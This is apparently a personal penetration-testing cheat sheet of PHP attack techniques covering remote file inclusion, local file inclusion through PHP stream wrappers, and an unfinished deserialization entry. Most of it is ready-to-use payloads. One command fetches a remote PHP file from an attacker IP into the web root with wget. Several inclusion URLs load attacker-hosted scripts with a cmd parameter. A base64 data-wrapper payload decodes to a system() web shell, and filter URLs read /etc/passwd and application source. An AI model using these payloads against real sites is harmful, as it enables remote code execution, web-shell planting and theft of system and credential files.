• Check to exe­cute PHP code
• Check URI handlers
• Check com­pose
• file_get_contents(…)
• If there is a remote file inclu­sion vul­ner­a­bil­i­ty with require or require_once like

  require_once($basePath."/inc/mysql.php"); <--- RFI

  then pro­vide a file local­ly which exe­cutes PHP and ref­er­ence this like server_file.php?basePath=http://192.168.119.158/aha.php?

• Down­load from remote a file which can be exe­cut­ed lat­er:
  <?php system("/usr/local/bin/wget http://$attackerip/r.php -O /usr/local/www/apache24/data/r.php") ?>

Local file inclusion and Wrappers

Gen­er­al: If you try to read PHP and noth­ing returns — use a base64 return!

• Exe­cute a com­mand via the input fil­ter
  index.php?page=php://input&cmd=ls
  • Oth­er method via the data wrap­per, from hack­tricks:
    index.php?lang=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTsgPz4==&cmd=ls
    • This base64 = <?php system($_GET['cmd']); ?>
• Read a file via the resource fil­ter:
  index.php?page=php://filter/resource=admin.php
  • The out­put could be fil­tered, espe­cial­ly when it’s php. Try instead direct con­ver­sions:
    index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
index.php?page=php://filter/write=string.rot13/resource=example.txt
• Read process infor­ma­tion:
  ?lang=/proc/$pid/cmdline // see proc article!
• Try to write into php://fd/2 which is stderr — if you can access a log, you could be able to exe­cute php code there.
• Force oth­er mime for­mat like index.php?file=data:text/plain,cleartext which can be used with oth­er mime types to bypass filters.
• See here for a list of PHP han­dlers which could also work in oth­er systems.
  • Inter­est­ing examples

Remote file inclusion

• It could be pos­si­ble to request thiry-par­ty con­tent, which we could pro­vide:
  index.php?page=http://$our_ip/s.php?cmd=ls

PHP deserialization

If a pro­gram accepts a seri­al­ized object which uses a mag­ic method, then… TODO, see here